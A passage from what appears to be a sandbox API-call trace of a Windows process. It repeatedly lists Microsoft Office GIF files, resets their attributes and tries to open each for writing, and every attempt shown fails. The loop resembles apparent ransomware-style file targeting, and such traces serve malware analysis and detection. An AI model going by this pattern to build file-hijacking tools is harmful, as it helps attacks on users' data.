office\\office14\\1033\\pubspapr\\pdir48b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.391] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.391] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.391] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.391] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.391] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR48F.GIF", dwFileAttributes=0x80) returned 0 [0136.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR48F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir48f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.392] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.392] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.392] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.392] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.392] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR49B.GIF", dwFileAttributes=0x80) returned 0 [0136.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR49B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir49b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.392] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.392] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.392] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.392] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR49F.GIF", dwFileAttributes=0x80) returned 0 [0136.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR49F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir49f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.393] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.393] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.393] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.393] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.393] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR4B.GIF", dwFileAttributes=0x80) returned 0 [0136.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR4B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir4b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.393] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.393] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.394] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.394] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.394] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR4F.GIF", dwFileAttributes=0x80) returned 0 [0136.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR4F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir4f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.394] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.394] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.394] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.394] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.394] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR50B.GIF", dwFileAttributes=0x80) returned 0 [0136.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR50B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir50b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.394] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.394] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.395] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.395] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.395] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR50F.GIF", dwFileAttributes=0x80) returned 0 [0136.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR50F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir50f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.395] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.395] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.395] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.396] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR51B.GIF", dwFileAttributes=0x80) returned 0 [0136.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR51B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir51b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.397] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.397] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.397] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.397] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.397] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR51F.GIF", dwFileAttributes=0x80) returned 0 [0136.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR51F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir51f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.398] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.398] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.398] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.398] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.398] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR5B.GIF", dwFileAttributes=0x80) returned 0 [0136.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR5B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir5b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.398] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.398] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.398] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.398] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR5F.GIF", dwFileAttributes=0x80) returned 0 [0136.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR5F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir5f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.399] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.399] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.399] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.399] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR6B.GIF", dwFileAttributes=0x80) returned 0 [0136.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR6B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir6b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.400] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.400] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.400] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.400] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.400] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR6F.GIF", dwFileAttributes=0x80) returned 0 [0136.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR6F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir6f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.400] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.400] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.401] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.401] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR7B.GIF", dwFileAttributes=0x80) returned 0 [0136.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR7B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir7b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.401] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.401] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.401] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.401] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.401] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR7F.GIF", dwFileAttributes=0x80) returned 0 [0136.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR7F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir7f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.402] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.402] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.402] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.402] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.402] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR8B.GIF", dwFileAttributes=0x80) returned 0 [0136.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR8B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir8b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.403] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.403] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.403] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.403] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR8F.GIF", dwFileAttributes=0x80) returned 0 [0136.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR8F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir8f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.403] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.403] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.403] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.403] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR9B.GIF", dwFileAttributes=0x80) returned 0 [0136.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR9B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir9b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.404] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.404] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.404] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.404] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR9F.GIF", dwFileAttributes=0x80) returned 0 [0136.404] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\PDIR9F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\pdir9f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.404] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.404] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.405] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.405] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.405] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.405] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR00.GIF", dwFileAttributes=0x80) returned 0 [0136.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR00.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir00.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.405] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.405] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.405] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.405] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.405] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR10F.GIF", dwFileAttributes=0x80) returned 0 [0136.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR10F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir10f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.406] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.406] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.406] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.406] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.406] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR11F.GIF", dwFileAttributes=0x80) returned 0 [0136.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR11F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir11f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.407] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.407] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.407] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.407] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.407] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR12F.GIF", dwFileAttributes=0x80) returned 0 [0136.407] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR12F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir12f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.407] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.407] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.407] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.407] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.408] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR13F.GIF", dwFileAttributes=0x80) returned 0 [0136.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR13F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir13f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.408] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.408] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.408] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.408] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.408] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR14F.GIF", dwFileAttributes=0x80) returned 0 [0136.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR14F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir14f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.412] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.412] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.412] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.412] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR15F.GIF", dwFileAttributes=0x80) returned 0 [0136.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR15F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir15f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.413] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.413] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.413] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.413] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.413] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR16F.GIF", dwFileAttributes=0x80) returned 0 [0136.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR16F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir16f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.413] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.413] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.414] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.414] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.414] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR17F.GIF", dwFileAttributes=0x80) returned 0 [0136.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR17F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir17f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.414] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.414] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.414] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: 